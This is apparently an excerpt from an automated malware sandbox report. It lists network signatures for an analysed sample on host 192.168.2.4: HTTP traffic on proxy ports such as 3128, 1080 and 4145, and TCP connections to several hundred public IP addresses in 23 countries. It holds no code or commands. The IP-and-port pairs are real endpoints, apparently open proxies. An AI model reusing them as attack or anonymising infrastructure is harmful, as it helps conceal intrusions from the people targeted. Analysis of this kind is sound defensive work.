                Source: unknownNetwork traffic detected: HTTP traffic on port 50928 -> 12217
                Source: unknownNetwork traffic detected: HTTP traffic on port 51779 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 4154 -> 51661
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 49935
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 49970
                Source: unknownNetwork traffic detected: HTTP traffic on port 51871 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 51898 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 51817 -> 13574
                Source: unknownNetwork traffic detected: HTTP traffic on port 51605 -> 9091
                Source: unknownNetwork traffic detected: HTTP traffic on port 50956 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 51827 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51038 -> 44827
                Source: unknownNetwork traffic detected: HTTP traffic on port 51923 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 51852 -> 27718
                Source: unknownNetwork traffic detected: HTTP traffic on port 51826 -> 27029
                Source: unknownNetwork traffic detected: HTTP traffic on port 51766 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50332 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 51831 -> 5279
                Source: unknownNetwork traffic detected: HTTP traffic on port 51865 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51170 -> 55806
                Source: unknownNetwork traffic detected: HTTP traffic on port 50973 -> 6045
                Source: unknownNetwork traffic detected: HTTP traffic on port 51624 -> 32251
                Source: unknownNetwork traffic detected: HTTP traffic on port 51609 -> 999
                Source: unknownNetwork traffic detected: HTTP traffic on port 51828 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 51131 -> 8989
                Source: unknownNetwork traffic detected: HTTP traffic on port 51151 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51878 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50097
                Source: unknownNetwork traffic detected: HTTP traffic on port 51822 -> 3389
                Source: unknownNetwork traffic detected: HTTP traffic on port 51940 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51855 -> 2324
                Source: unknownNetwork traffic detected: HTTP traffic on port 51932 -> 51511
                Source: unknownNetwork traffic detected: HTTP traffic on port 51222 -> 4228
                Source: unknownNetwork traffic detected: HTTP traffic on port 51791 -> 50554
                Source: unknownNetwork traffic detected: HTTP traffic on port 51788 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 51122 -> 45725
                Source: unknownNetwork traffic detected: HTTP traffic on port 51113 -> 62310
                Source: unknownNetwork traffic detected: HTTP traffic on port 51591 -> 32210
                Source: unknownNetwork traffic detected: HTTP traffic on port 65533 -> 51558
                Source: unknownNetwork traffic detected: HTTP traffic on port 51863 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 51045 -> 21605
                Source: unknownNetwork traffic detected: HTTP traffic on port 51268 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51881 -> 9002
                Source: unknownNetwork traffic detected: HTTP traffic on port 51980 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 51977 -> 31654
                Source: unknownNetwork traffic detected: HTTP traffic on port 51286 -> 55361
                Source: unknownNetwork traffic detected: HTTP traffic on port 51982 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51986 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51987 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51457 -> 9999
                Source: unknownNetwork traffic detected: HTTP traffic on port 51942 -> 8193
                Source: unknownNetwork traffic detected: HTTP traffic on port 4228 -> 51222
                Source: unknownNetwork traffic detected: HTTP traffic on port 51568 -> 6004
                Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 49980
                Source: unknownNetwork traffic detected: HTTP traffic on port 51681 -> 48298
                Source: unknownNetwork traffic detected: HTTP traffic on port 50900 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51153 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 51621 -> 34409
                Source: unknownNetwork traffic detected: HTTP traffic on port 51631 -> 29380
                Source: unknownNetwork traffic detected: HTTP traffic on port 51671 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 50979 -> 33268
                Source: unknownNetwork traffic detected: HTTP traffic on port 51125 -> 47460
                Source: unknownNetwork traffic detected: HTTP traffic on port 52003 -> 10011
                Source: unknownNetwork traffic detected: HTTP traffic on port 51147 -> 53281
                Source: unknownNetwork traffic detected: HTTP traffic on port 51858 -> 6969
                Source: unknownNetwork traffic detected: HTTP traffic on port 51953 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51930 -> 8002
                Source: unknownNetwork traffic detected: HTTP traffic on port 51243 -> 16487
                Source: unknownNetwork traffic detected: HTTP traffic on port 51169 -> 4893
                Source: unknownNetwork traffic detected: HTTP traffic on port 52011 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51979 -> 1081
                Source: unknownNetwork traffic detected: HTTP traffic on port 51245 -> 9090
                Source: unknownNetwork traffic detected: HTTP traffic on port 51976 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 51356 -> 48962
                Source: unknownNetwork traffic detected: HTTP traffic on port 52022 -> 27391
                Source: unknownNetwork traffic detected: HTTP traffic on port 51446 -> 7302
                Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 33082
                Source: unknownNetwork traffic detected: HTTP traffic on port 51967 -> 36181
                Source: unknownNetwork traffic detected: HTTP traffic on port 52069 -> 4145
                Source: unknownNetwork traffic detected: IP country count 23
                Source: global trafficTCP traffic: 192.168.2.4:49733 -> 195.178.56.33:8080
                Source: global trafficTCP traffic: 192.168.2.4:49735 -> 191.97.9.228:999
                Source: global trafficTCP traffic: 192.168.2.4:49736 -> 161.97.173.42:5379
                Source: global trafficTCP traffic: 192.168.2.4:49737 -> 190.109.72.33:33633
                Source: global trafficTCP traffic: 192.168.2.4:49739 -> 38.162.21.241:3128
                Source: global trafficTCP traffic: 192.168.2.4:49741 -> 124.198.74.90:26976
                Source: global trafficTCP traffic: 192.168.2.4:49742 -> 13.38.176.104:3128
                Source: global trafficTCP traffic: 192.168.2.4:49743 -> 101.51.124.223:4145
                Source: global trafficTCP traffic: 192.168.2.4:49744 -> 8.242.178.5:999
                Source: global trafficTCP traffic: 192.168.2.4:49745 -> 102.128.173.1:5678
                Source: global trafficTCP traffic: 192.168.2.4:49746 -> 103.84.178.193:4153
                Source: global trafficTCP traffic: 192.168.2.4:49748 -> 195.177.217.131:31490
                Source: global trafficTCP traffic: 192.168.2.4:49750 -> 193.239.86.249:3128
                Source: global trafficTCP traffic: 192.168.2.4:49751 -> 190.4.205.226:4153
                Source: global trafficTCP traffic: 192.168.2.4:49752 -> 75.119.200.27:23456
                Source: global trafficTCP traffic: 192.168.2.4:49754 -> 164.92.86.113:57391
                Source: global trafficTCP traffic: 192.168.2.4:49755 -> 35.185.196.38:3128
                Source: global trafficTCP traffic: 192.168.2.4:49756 -> 191.102.254.26:8085
                Source: global trafficTCP traffic: 192.168.2.4:49758 -> 117.54.106.241:8080
                Source: global trafficTCP traffic: 192.168.2.4:49759 -> 41.57.37.125:5678
                Source: global trafficTCP traffic: 192.168.2.4:49760 -> 103.188.177.22:8093
                Source: global trafficTCP traffic: 192.168.2.4:49761 -> 190.151.166.122:4153
                Source: global trafficTCP traffic: 192.168.2.4:49763 -> 103.81.221.101:8080
                Source: global trafficTCP traffic: 192.168.2.4:49764 -> 37.26.223.96:9080
                Source: global trafficTCP traffic: 192.168.2.4:49766 -> 45.67.210.47:3389
                Source: global trafficTCP traffic: 192.168.2.4:49767 -> 81.43.68.47:8080
                Source: global trafficTCP traffic: 192.168.2.4:49768 -> 147.124.212.31:24230
                Source: global trafficTCP traffic: 192.168.2.4:49771 -> 146.59.155.82:16276
                Source: global trafficTCP traffic: 192.168.2.4:49772 -> 52.13.248.29:3128
                Source: global trafficTCP traffic: 192.168.2.4:49773 -> 213.226.16.46:51372
                Source: global trafficTCP traffic: 192.168.2.4:49774 -> 35.79.120.242:3128
                Source: global trafficTCP traffic: 192.168.2.4:49775 -> 132.148.167.243:40961
                Source: global trafficTCP traffic: 192.168.2.4:49776 -> 114.231.46.18:8089
                Source: global trafficTCP traffic: 192.168.2.4:49778 -> 159.223.71.71:52542
                Source: global trafficTCP traffic: 192.168.2.4:49779 -> 46.36.70.104:46964
                Source: global trafficTCP traffic: 192.168.2.4:49780 -> 204.199.120.28:999
                Source: global trafficTCP traffic: 192.168.2.4:49781 -> 162.241.45.22:33082
                Source: global trafficTCP traffic: 192.168.2.4:49782 -> 50.63.12.33:50781
                Source: global trafficTCP traffic: 192.168.2.4:49783 -> 38.242.199.111:5670
                Source: global trafficTCP traffic: 192.168.2.4:49784 -> 178.79.165.164:7507
                Source: global trafficTCP traffic: 192.168.2.4:49785 -> 162.0.220.216:44158
                Source: global trafficTCP traffic: 192.168.2.4:49786 -> 43.255.113.232:8084
                Source: global trafficTCP traffic: 192.168.2.4:49787 -> 38.156.73.50:8080
                Source: global trafficTCP traffic: 192.168.2.4:49789 -> 123.182.59.47:8089
                Source: global trafficTCP traffic: 192.168.2.4:49790 -> 51.158.64.130:16379
                Source: global trafficTCP traffic: 192.168.2.4:49792 -> 120.37.121.209:9091
                Source: global trafficTCP traffic: 192.168.2.4:49793 -> 38.50.130.93:5678
                Source: global trafficTCP traffic: 192.168.2.4:49794 -> 115.147.38.172:8080
                Source: global trafficTCP traffic: 192.168.2.4:49796 -> 103.115.242.192:8080
                Source: global trafficTCP traffic: 192.168.2.4:49797 -> 102.132.38.246:8080
                Source: global trafficTCP traffic: 192.168.2.4:49798 -> 190.193.142.156:3128
                Source: global trafficTCP traffic: 192.168.2.4:49799 -> 92.249.122.108:61778
                Source: global trafficTCP traffic: 192.168.2.4:49800 -> 132.148.245.169:38117
                Source: global trafficTCP traffic: 192.168.2.4:49801 -> 208.87.131.240:29624
                Source: global trafficTCP traffic: 192.168.2.4:49802 -> 162.214.225.223:53340
                Source: global trafficTCP traffic: 192.168.2.4:49803 -> 72.10.160.91:18031
                Source: global trafficTCP traffic: 192.168.2.4:49804 -> 175.100.91.212:8080
                Source: global trafficTCP traffic: 192.168.2.4:49806 -> 81.91.231.57:8080
                Source: global trafficTCP traffic: 192.168.2.4:49807 -> 38.162.22.48:3128
                Source: global trafficTCP traffic: 192.168.2.4:49808 -> 223.113.89.138:1080
                Source: global trafficTCP traffic: 192.168.2.4:49810 -> 202.150.134.202:8080
                Source: global trafficTCP traffic: 192.168.2.4:49811 -> 95.84.166.138:8080
                Source: global trafficTCP traffic: 192.168.2.4:49812 -> 116.107.201.14:4006
                Source: global trafficTCP traffic: 192.168.2.4:49813 -> 104.238.98.87:45803
                Source: global trafficTCP traffic: 192.168.2.4:49814 -> 162.214.170.144:31701
                Source: global trafficTCP traffic: 192.168.2.4:49815 -> 54.36.122.16:29796
                Source: global trafficTCP traffic: 192.168.2.4:49816 -> 193.138.178.6:8282
                Source: global trafficTCP traffic: 192.168.2.4:49817 -> 213.233.177.180:3000
                Source: global trafficTCP traffic: 192.168.2.4:49818 -> 132.148.128.88:29313
                Source: global trafficTCP traffic: 192.168.2.4:49819 -> 185.92.244.10:63550
                Source: global trafficTCP traffic: 192.168.2.4:49821 -> 103.28.121.58:3128
                Source: global trafficTCP traffic: 192.168.2.4:49826 -> 175.29.174.242:10800
                Source: global trafficTCP traffic: 192.168.2.4:49827 -> 45.240.182.120:1981
                Source: global trafficTCP traffic: 192.168.2.4:49829 -> 200.52.148.10:999
                Source: global trafficTCP traffic: 192.168.2.4:49830 -> 91.150.77.58:56921
                Source: global trafficTCP traffic: 192.168.2.4:49831 -> 45.239.30.1:999
                Source: global trafficTCP traffic: 192.168.2.4:49834 -> 200.41.148.2:12000
                Source: global trafficTCP traffic: 192.168.2.4:49835 -> 176.197.103.58:4145
                Source: global trafficTCP traffic: 192.168.2.4:49836 -> 41.155.190.214:8080
                Source: global trafficTCP traffic: 192.168.2.4:49837 -> 116.90.179.198:8080
                Source: global trafficTCP traffic: 192.168.2.4:49838 -> 186.150.207.207:8080
                Source: global trafficTCP traffic: 192.168.2.4:49839 -> 176.98.81.85:8080
                Source: global trafficTCP traffic: 192.168.2.4:49841 -> 98.64.169.17:8080
                Source: global trafficTCP traffic: 192.168.2.4:49842 -> 20.111.54.16:8123
                Source: global trafficTCP traffic: 192.168.2.4:49843 -> 109.194.22.61:8080
                Source: global trafficTCP traffic: 192.168.2.4:49846 -> 62.122.201.246:50129
                Source: global trafficTCP traffic: 192.168.2.4:49848 -> 190.187.201.26:8080
                Source: global trafficTCP traffic: 192.168.2.4:49849 -> 23.111.102.1:9002
                Source: global trafficTCP traffic: 192.168.2.4:49850 -> 210.179.101.88:3128
                Source: global trafficTCP traffic: 192.168.2.4:49854 -> 66.84.6.21:51996
                Source: global trafficTCP traffic: 192.168.2.4:49856 -> 203.96.177.211:43839
                Source: global trafficTCP traffic: 192.168.2.4:49857 -> 80.72.68.247:8082
                Source: global trafficTCP traffic: 192.168.2.4:49858 -> 61.173.113.226:8888
                Source: global trafficTCP traffic: 192.168.2.4:49860 -> 94.23.220.136:25256
                Source: global trafficTCP traffic: 192.168.2.4:49861 -> 113.74.26.114:4145
                Source: global trafficTCP traffic: 192.168.2.4:49862 -> 202.29.215.78:8080
                Source: global trafficTCP traffic: 192.168.2.4:49863 -> 67.43.227.227:7347
                Source: global trafficTCP traffic: 192.168.2.4:49864 -> 46.209.207.150:8080
                Source: global trafficTCP traffic: 192.168.2.4:49865 -> 138.201.21.218:65032
                Source: global trafficTCP traffic: 192.168.2.4:49867 -> 51.79.249.186:3128
                Source: global trafficTCP traffic: 192.168.2.4:49869 -> 43.134.20.174:15673
                Source: global trafficTCP traffic: 192.168.2.4:49870 -> 197.254.84.86:32650
                Source: global trafficTCP traffic: 192.168.2.4:49871 -> 37.207.45.15:48678
                Source: global trafficTCP traffic: 192.168.2.4:49872 -> 38.162.31.211:3128
                Source: global trafficTCP traffic: 192.168.2.4:49873 -> 213.136.78.200:40927
                Source: global trafficTCP traffic: 192.168.2.4:49874 -> 87.126.65.11:1388
                Source: global trafficTCP traffic: 192.168.2.4:49876 -> 114.231.45.178:8089
                Source: global trafficTCP traffic: 192.168.2.4:49877 -> 185.129.250.183:26777
                Source: global trafficTCP traffic: 192.168.2.4:49878 -> 66.228.35.209:19497
                Source: global trafficTCP traffic: 192.168.2.4:49879 -> 43.132.184.228:8181
                Source: global trafficTCP traffic: 192.168.2.4:49880 -> 103.36.35.135:8080
                Source: global trafficTCP traffic: 192.168.2.4:49881 -> 35.154.71.72:1080
                Source: global trafficTCP traffic: 192.168.2.4:49882 -> 103.234.24.42:9990
                Source: global trafficTCP traffic: 192.168.2.4:49883 -> 220.247.162.7:8080
                Source: global trafficTCP traffic: 192.168.2.4:49884 -> 98.103.88.158:46104
                Source: global trafficTCP traffic: 192.168.2.4:49885 -> 191.96.100.33:3155
                Source: global trafficTCP traffic: 192.168.2.4:49886 -> 45.112.125.57:4145
                Source: global trafficTCP traffic: 192.168.2.4:49887 -> 180.211.161.110:8080
                Source: global trafficTCP traffic: 192.168.2.4:49888 -> 186.224.225.98:4145
                Source: global trafficTCP traffic: 192.168.2.4:49889 -> 66.228.37.252:14321
                Source: global trafficTCP traffic: 192.168.2.4:49890 -> 103.85.103.129:5678
                Source: global trafficTCP traffic: 192.168.2.4:49891 -> 182.160.109.162:8080
                Source: global trafficTCP traffic: 192.168.2.4:49892 -> 72.10.160.174:7667
                Source: global trafficTCP traffic: 192.168.2.4:49893 -> 143.198.49.49:3240
                Source: global trafficTCP traffic: 192.168.2.4:49894 -> 46.98.191.58:1111
                Source: global trafficTCP traffic: 192.168.2.4:49895 -> 79.110.119.209:8080
                Source: global trafficTCP traffic: 192.168.2.4:49896 -> 167.86.69.142:44439
                Source: global trafficTCP traffic: 192.168.2.4:49897 -> 197.242.146.109:3128
                Source: global trafficTCP traffic: 192.168.2.4:49898 -> 212.88.109.89:3128
                Source: global trafficTCP traffic: 192.168.2.4:49899 -> 107.180.90.88:20309
                Source: global trafficTCP traffic: 192.168.2.4:49900 -> 190.4.209.58:4153
                Source: global trafficTCP traffic: 192.168.2.4:49902 -> 72.10.164.178:24593
                Source: global trafficTCP traffic: 192.168.2.4:49903 -> 188.168.24.222:81
                Source: global trafficTCP traffic: 192.168.2.4:49904 -> 130.162.213.175:3129
                Source: global trafficTCP traffic: 192.168.2.4:49906 -> 185.32.44.157:4153
                Source: global trafficTCP traffic: 192.168.2.4:49908 -> 181.78.11.217:999
                Source: global trafficTCP traffic: 192.168.2.4:49909 -> 105.113.2.82:8080
                Source: global trafficTCP traffic: 192.168.2.4:49910 -> 69.160.223.33:8181
                Source: global trafficTCP traffic: 192.168.2.4:49911 -> 189.240.60.169:9090
                Source: global trafficTCP traffic: 192.168.2.4:49912 -> 183.96.235.105:18572
                Source: global trafficTCP traffic: 192.168.2.4:49915 -> 13.234.24.116:3128
                Source: global trafficTCP traffic: 192.168.2.4:49916 -> 98.178.72.21:10919
                Source: global trafficTCP traffic: 192.168.2.4:49917 -> 199.116.114.11:4145
                Source: global trafficTCP traffic: 192.168.2.4:49918 -> 72.210.221.223:4145
                Source: global trafficTCP traffic: 192.168.2.4:49921 -> 117.160.250.134:8899
                Source: global trafficTCP traffic: 192.168.2.4:49922 -> 45.11.95.165:5020
                Source: global trafficTCP traffic: 192.168.2.4:49923 -> 95.47.149.8:8080
                Source: global trafficTCP traffic: 192.168.2.4:49924 -> 38.54.95.19:3128
                Source: global trafficTCP traffic: 192.168.2.4:49925 -> 158.69.53.98:9300
                Source: global trafficTCP traffic: 192.168.2.4:49926 -> 23.94.73.246:1080
                Source: global trafficTCP traffic: 192.168.2.4:49927 -> 104.238.111.107:30026
                Source: global trafficTCP traffic: 192.168.2.4:49928 -> 185.49.30.5:8081
                Source: global trafficTCP traffic: 192.168.2.4:49929 -> 103.47.93.196:1080
                Source: global trafficTCP traffic: 192.168.2.4:49931 -> 49.48.47.72:8080
                Source: global trafficTCP traffic: 192.168.2.4:49933 -> 181.65.169.37:999
                Source: global trafficTCP traffic: 192.168.2.4:49935 -> 38.162.19.55:3128
                Source: global trafficTCP traffic: 192.168.2.4:49936 -> 68.1.210.163:4145
                Source: global trafficTCP traffic: 192.168.2.4:49937 -> 144.21.52.220:3128
                Source: global trafficTCP traffic: 192.168.2.4:49939 -> 67.43.228.254:1487
                Source: global trafficTCP traffic: 192.168.2.4:49940 -> 161.49.91.13:1337
                Source: global trafficTCP traffic: 192.168.2.4:49942 -> 122.202.3.137:5678
                Source: global trafficTCP traffic: 192.168.2.4:49943 -> 37.187.77.58:19767
                Source: global trafficTCP traffic: 192.168.2.4:49944 -> 27.0.234.206:1080
                Source: global trafficTCP traffic: 192.168.2.4:49945 -> 162.241.46.40:50062
                Source: global trafficTCP traffic: 192.168.2.4:49946 -> 178.253.208.146:1080
                Source: global trafficTCP traffic: 192.168.2.4:49950 -> 107.180.90.42:10670
                Source: global trafficTCP traffic: 192.168.2.4:49952 -> 82.223.121.72:27137
                Source: global trafficTCP traffic: 192.168.2.4:49953 -> 185.174.137.30:3128
                Source: global trafficTCP traffic: 192.168.2.4:49954 -> 77.137.39.241:19000
                Source: global trafficTCP traffic: 192.168.2.4:49955 -> 187.73.188.35:8080
                Source: global trafficTCP traffic: 192.168.2.4:49958 -> 36.89.245.65:8080
                Source: global trafficTCP traffic: 192.168.2.4:49956 -> 45.185.163.111:999
                Source: global trafficTCP traffic: 192.168.2.4:49957 -> 201.251.155.253:5678
                Source: global trafficTCP traffic: 192.168.2.4:49959 -> 8.218.205.195:5555
                Source: global trafficTCP traffic: 192.168.2.4:49960 -> 190.238.231.65:1994
                Source: global trafficTCP traffic: 192.168.2.4:49965 -> 190.97.238.90:999
                Source: global trafficTCP traffic: 192.168.2.4:49962 -> 62.201.212.198:4673
                Source: global trafficTCP traffic: 192.168.2.4:49963 -> 107.180.88.173:44568
                Source: global trafficTCP traffic: 192.168.2.4:49964 -> 187.111.194.25:8080
                Source: global trafficTCP traffic: 192.168.2.4:49966 -> 189.50.129.43:5678
                Source: global trafficTCP traffic: 192.168.2.4:49967 -> 183.234.215.11:8443
                Source: global trafficTCP traffic: 192.168.2.4:49968 -> 201.91.82.155:3128
                Source: global trafficTCP traffic: 192.168.2.4:49969 -> 162.144.79.97:2877
                Source: global trafficTCP traffic: 192.168.2.4:49970 -> 38.162.9.72:3128
                Source: global trafficTCP traffic: 192.168.2.4:49973 -> 148.72.209.174:16203
                Source: global trafficTCP traffic: 192.168.2.4:49974 -> 111.224.213.86:8089
                Source: global trafficTCP traffic: 192.168.2.4:49975 -> 156.239.49.152:3128
                Source: global trafficTCP traffic: 192.168.2.4:49978 -> 38.52.222.220:999
                Source: global trafficTCP traffic: 192.168.2.4:49979 -> 41.222.8.254:8082
                Source: global trafficTCP traffic: 192.168.2.4:49980 -> 89.35.237.187:8888
                Source: global trafficTCP traffic: 192.168.2.4:49981 -> 148.66.130.187:20962
                Source: global trafficTCP traffic: 192.168.2.4:49982 -> 162.241.70.64:62874
                Source: global trafficTCP traffic: 192.168.2.4:49983 -> 54.36.81.217:8080
                Source: global trafficTCP traffic: 192.168.2.4:49984 -> 139.162.238.184:4837
                Source: global trafficTCP traffic: 192.168.2.4:49986 -> 185.200.37.98:8080
                Source: global trafficTCP traffic: 192.168.2.4:49987 -> 38.7.4.90:999
                Source: global trafficTCP traffic: 192.168.2.4:49989 -> 193.19.255.21:8080
                Source: global trafficTCP traffic: 192.168.2.4:49990 -> 118.163.13.200:8080
                Source: global trafficTCP traffic: 192.168.2.4:49991 -> 202.139.198.15:3060
                Source: global trafficTCP traffic: 192.168.2.4:49993 -> 114.231.45.81:8089
                Source: global trafficTCP traffic: 192.168.2.4:49994 -> 177.87.15.141:8081
                Source: global trafficTCP traffic: 192.168.2.4:49996 -> 212.83.137.30:41274
                Source: global trafficTCP traffic: 192.168.2.4:49997 -> 23.108.77.243:8118
                Source: global trafficTCP traffic: 192.168.2.4:49998 -> 72.10.160.90:10367
                Source: global trafficTCP traffic: 192.168.2.4:49999 -> 185.86.5.162:8975
                Source: global trafficTCP traffic: 192.168.2.4:50000 -> 168.232.213.9:4153
                Source: global trafficTCP traffic: 192.168.2.4:50001 -> 122.3.41.154:8090
                Source: global trafficTCP traffic: 192.168.2.4:50002 -> 185.194.11.180:8080
                Source: global trafficTCP traffic: 192.168.2.4:50003 -> 103.86.1.22:4145
                Source: global trafficTCP traffic: 192.168.2.4:50004 -> 162.241.50.179:57364
                Source: global trafficTCP traffic: 192.168.2.4:50006 -> 41.33.254.188:1981
                Source: global trafficTCP traffic: 192.168.2.4:50008 -> 45.6.224.254:999
                Source: global trafficTCP traffic: 192.168.2.4:50009 -> 92.204.136.149:53035
                Source: global trafficTCP traffic: 192.168.2.4:50010 -> 208.109.14.49:30993
                Source: global trafficTCP traffic: 192.168.2.4:50012 -> 181.204.0.36:999
                Source: global trafficTCP traffic: 192.168.2.4:50011 -> 110.34.166.182:4153
                Source: global trafficTCP traffic: 192.168.2.4:50013 -> 115.127.112.74:8090
                Source: global trafficTCP traffic: 192.168.2.4:50015 -> 142.93.2.222:8000
                Source: global trafficTCP traffic: 192.168.2.4:50014 -> 88.99.138.21:5088
                Source: global trafficTCP traffic: 192.168.2.4:50016 -> 5.78.44.6:8080
                Source: global trafficTCP traffic: 192.168.2.4:50017 -> 128.199.196.31:27102
                Source: global trafficTCP traffic: 192.168.2.4:50018 -> 91.134.140.160:51513
                Source: global trafficTCP traffic: 192.168.2.4:50019 -> 92.204.135.37:58604
                Source: global trafficTCP traffic: 192.168.2.4:50020 -> 163.47.210.74:8080
                Source: global trafficTCP traffic: 192.168.2.4:50021 -> 45.138.87.238:1080
                Source: global trafficTCP traffic: 192.168.2.4:50022 -> 45.228.147.209:5678
                Source: global trafficTCP traffic: 192.168.2.4:50023 -> 45.174.248.19:999
                Source: global trafficTCP traffic: 192.168.2.4:50025 -> 190.94.212.150:999
                Source: global trafficTCP traffic: 192.168.2.4:50026 -> 50.113.36.155:8080
                Source: global trafficTCP traffic: 192.168.2.4:50027 -> 188.133.155.215:1256
                Source: global trafficTCP traffic: 192.168.2.4:50028 -> 182.253.181.10:8080
                Source: global trafficTCP traffic: 192.168.2.4:50030 -> 45.230.49.2:999
                Source: global trafficTCP traffic: 192.168.2.4:50031 -> 154.126.81.163:8080
                Source: global trafficTCP traffic: 192.168.2.4:50032 -> 103.231.177.24:9990
                Source: global trafficTCP traffic: 192.168.2.4:50033 -> 35.1.148.111:8080
                Source: global trafficTCP traffic: 192.168.2.4:50034 -> 186.167.81.122:999
                Source: global trafficTCP traffic: 192.168.2.4:50037 -> 103.117.109.5:4153
                Source: global trafficTCP traffic: 192.168.2.4:50038 -> 47.90.200.204:19527
                Source: global trafficTCP traffic: 192.168.2.4:50039 -> 103.102.141.39:4145
                Source: global trafficTCP traffic: 192.168.2.4:50040 -> 67.43.228.253:19285
                Source: global trafficTCP traffic: 192.168.2.4:50041 -> 107.180.90.248:40330
                Source: global trafficTCP traffic: 192.168.2.4:50042 -> 77.235.28.229:4153
                Source: global trafficTCP traffic: 192.168.2.4:50044 -> 31.217.213.227:8090
                Source: global trafficTCP traffic: 192.168.2.4:50045 -> 85.248.57.129:4153
                Source: global trafficTCP traffic: 192.168.2.4:50046 -> 98.6.197.202:16099
                Source: global trafficTCP traffic: 192.168.2.4:50047 -> 92.204.134.38:54467
                Source: global trafficTCP traffic: 192.168.2.4:50048 -> 122.129.84.12:8080
                Source: global trafficTCP traffic: 192.168.2.4:50049 -> 199.229.254.129:4145
                Source: global trafficTCP traffic: 192.168.2.4:50050 -> 45.128.133.153:1080
                Source: global trafficTCP traffic: 192.168.2.4:50051 -> 176.77.9.22:5678
                Source: global trafficTCP traffic: 192.168.2.4:50054 -> 67.43.228.250:14713
                Source: global trafficTCP traffic: 192.168.2.4:50055 -> 103.51.21.250:83
                Source: global trafficTCP traffic: 192.168.2.4:50056 -> 142.54.237.34:4145
                Source: global trafficTCP traffic: 192.168.2.4:50057 -> 200.111.232.94:8080
                Source: global trafficTCP traffic: 192.168.2.4:50060 -> 201.77.110.1:999
                Source: global trafficTCP traffic: 192.168.2.4:50062 -> 103.106.115.50:3128
                Source: global trafficTCP traffic: 192.168.2.4:50063 -> 92.205.110.47:17158
                Source: global trafficTCP traffic: 192.168.2.4:50066 -> 51.15.211.81:16379
                Source: global trafficTCP traffic: 192.168.2.4:50067 -> 176.31.110.126:45517
                Source: global trafficTCP traffic: 192.168.2.4:50069 -> 14.207.206.27:5678
                Source: global trafficTCP traffic: 192.168.2.4:50070 -> 122.252.179.66:5678
                Source: global trafficTCP traffic: 192.168.2.4:50073 -> 161.97.163.52:18693
                Source: global trafficTCP traffic: 192.168.2.4:50075 -> 197.232.47.122:8080
                Source: global trafficTCP traffic: 192.168.2.4:50077 -> 179.49.162.133:999
                Source: global trafficTCP traffic: 192.168.2.4:50079 -> 49.48.126.12:8080
                Source: global trafficTCP traffic: 192.168.2.4:50083 -> 200.41.170.211:11201
                Source: global trafficTCP traffic: 192.168.2.4:50084 -> 89.248.204.178:3128
                Source: global trafficTCP traffic: 192.168.2.4:50086 -> 184.178.172.23:4145
                Source: global trafficTCP traffic: 192.168.2.4:50078 -> 162.241.46.6:50062
                Source: global trafficTCP traffic: 192.168.2.4:50087 -> 113.22.93.112:3128
                Source: global trafficTCP traffic: 192.168.2.4:50089 -> 103.113.71.230:3128
                Source: global trafficTCP traffic: 192.168.2.4:50088 -> 103.139.144.242:8080
                Source: global trafficTCP traffic: 192.168.2.4:50091 -> 23.225.72.122:3500
                Source: global trafficTCP traffic: 192.168.2.4:50092 -> 216.10.242.18:29057
                Source: global trafficTCP traffic: 192.168.2.4:50093 -> 148.72.206.250:14076
                Source: global trafficTCP traffic: 192.168.2.4:50095 -> 67.213.212.50:39988
                Source: global trafficTCP traffic: 192.168.2.4:50096 -> 125.27.10.84:4153
                Source: global trafficTCP traffic: 192.168.2.4:50097 -> 38.162.16.221:3128
                Source: global trafficTCP traffic: 192.168.2.4:50098 -> 45.81.232.17:34447
                Source: global trafficTCP traffic: 192.168.2.4:50099 -> 38.56.70.97:999
                Source: global trafficTCP traffic: 192.168.2.4:50100 -> 187.228.145.138:8080
                Source: global trafficTCP traffic: 192.168.2.4:50101 -> 209.97.175.231:45337
                Source: global trafficTCP traffic: 192.168.2.4:50102 -> 95.158.179.216:32799
                Source: global trafficTCP traffic: 192.168.2.4:50103 -> 184.82.142.18:4145
                Source: global trafficTCP traffic: 192.168.2.4:50106 -> 110.78.151.213:4145
                Source: global trafficTCP traffic: 192.168.2.4:50107 -> 187.79.146.98:8080
                Source: global trafficTCP traffic: 192.168.2.4:50108 -> 14.207.117.32:4153
                Source: global trafficTCP traffic: 192.168.2.4:50109 -> 171.244.140.160:27020
                Source: global trafficTCP traffic: 192.168.2.4:50110 -> 154.236.179.226:1976
                Source: global trafficTCP traffic: 192.168.2.4:50111 -> 181.39.27.225:1994
                Source: global trafficTCP traffic: 192.168.2.4:50112 -> 148.72.215.79:38538
                Source: global trafficTCP traffic: 192.168.2.4:50114 -> 201.71.2.177:999
                Source: global trafficTCP traffic: 192.168.2.4:50115 -> 114.132.202.246:8080
                Source: global trafficTCP traffic: 192.168.2.4:50116 -> 23.225.72.123:3501
                Source: global trafficTCP traffic: 192.168.2.4:50117 -> 213.247.209.185:3128
                Source: global trafficTCP traffic: 192.168.2.4:50118 -> 67.43.236.20:10891
